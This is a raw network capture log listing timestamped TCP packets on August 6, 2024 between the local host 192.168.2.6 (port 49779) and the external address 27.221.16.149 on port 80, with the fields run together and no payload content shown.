                                                                                                                                    Aug 6, 2024 10:30:29.434297085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434309959 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434330940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434345007 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434350967 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434360027 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434381008 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434447050 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434461117 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434474945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434489965 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434498072 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434504032 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434525013 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434530020 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434539080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434546947 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434546947 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.434554100 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434561968 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.434699059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.435205936 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.435249090 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.435251951 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.435267925 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.435309887 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.435363054 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.435379028 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.435425997 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914232016 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914256096 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914271116 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914284945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914307117 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914319992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914325953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914335012 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914349079 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914361954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914378881 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914381027 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914402962 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914419889 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914428949 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914442062 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914457083 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914484024 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914486885 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914501905 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914515018 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914529085 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914529085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914541960 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914556026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914568901 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914576054 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914587021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914616108 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914628029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914648056 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914660931 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914674997 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914689064 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914700985 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914702892 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914716959 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914722919 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914731979 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914746046 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914756060 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914758921 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914776087 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914787054 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914796114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914803982 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914809942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914823055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914832115 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914836884 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914865017 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.914946079 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914967060 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.914980888 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915003061 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915007114 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915018082 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915030003 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915031910 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915046930 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915060043 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915060043 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915074110 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915087938 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915096045 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915107965 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915108919 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915123940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915137053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915149927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915162086 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915164948 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915194988 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915205002 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915247917 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915261984 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915276051 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915287971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915301085 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:29.915319920 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:29.915348053 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.034621000 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034673929 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034707069 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034739017 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034763098 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.034790993 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034807920 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.034823895 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034873962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034892082 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.034905910 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034951925 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.034954071 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.034985065 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035032034 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035044909 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035067081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035099983 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035118103 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035130978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035162926 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035182953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035196066 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035242081 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035252094 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035284042 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035317898 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035331964 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035351038 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035463095 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035496950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035517931 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035535097 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035545111 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035584927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035634041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035665989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035681963 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035697937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035713911 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035729885 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035763025 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035792112 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035794973 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.035938025 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035969973 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.035990000 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036020041 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036020041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036070108 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036103010 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036134005 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036166906 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036166906 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036199093 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036201000 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036231995 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036263943 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036278963 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036295891 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036304951 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036463022 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036529064 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036561966 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036581993 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036608934 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036614895 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036662102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036694050 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036725998 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036741972 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036757946 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036772013 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036789894 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036820889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036853075 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036870003 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036884069 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036894083 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.036916971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036950111 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.036971092 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.083262920 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378012896 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378067970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378081083 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378091097 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378107071 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378118038 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378129005 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378142118 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378154039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378165007 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378176928 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378186941 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378196955 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378206015 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378206968 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378209114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378220081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378232002 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378242970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378253937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378263950 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378264904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378264904 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378278017 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378324986 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378365993 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378366947 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378386974 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378397942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378434896 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378447056 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378458977 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378499031 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378499031 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378536940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378550053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378561020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378571987 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378582954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378593922 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378613949 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378613949 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.378633022 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.378650904 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379012108 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379024029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379035950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379067898 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379079103 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379090071 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379101992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379129887 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379148006 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379213095 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379225016 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379235983 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379246950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379256964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379267931 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379280090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379291058 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379302979 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379311085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379311085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379343033 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379348040 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379359961 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379371881 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379457951 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.379951954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379965067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.379975080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.380059004 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.427030087 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.467510939 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.520859957 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.717811108 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717828989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717904091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.717906952 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717920065 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717931986 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717941999 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717953920 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717957020 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.717966080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717979908 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.717998028 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.717998028 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718036890 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718050957 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718139887 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718202114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718311071 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718385935 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718399048 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718410015 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718421936 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718432903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718445063 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718473911 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718473911 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718647003 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718873978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718885899 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718897104 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718907118 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718919039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718929052 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718940973 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718951941 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.718965054 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.718965054 CEST4977980192.168.2.627.221.16.149
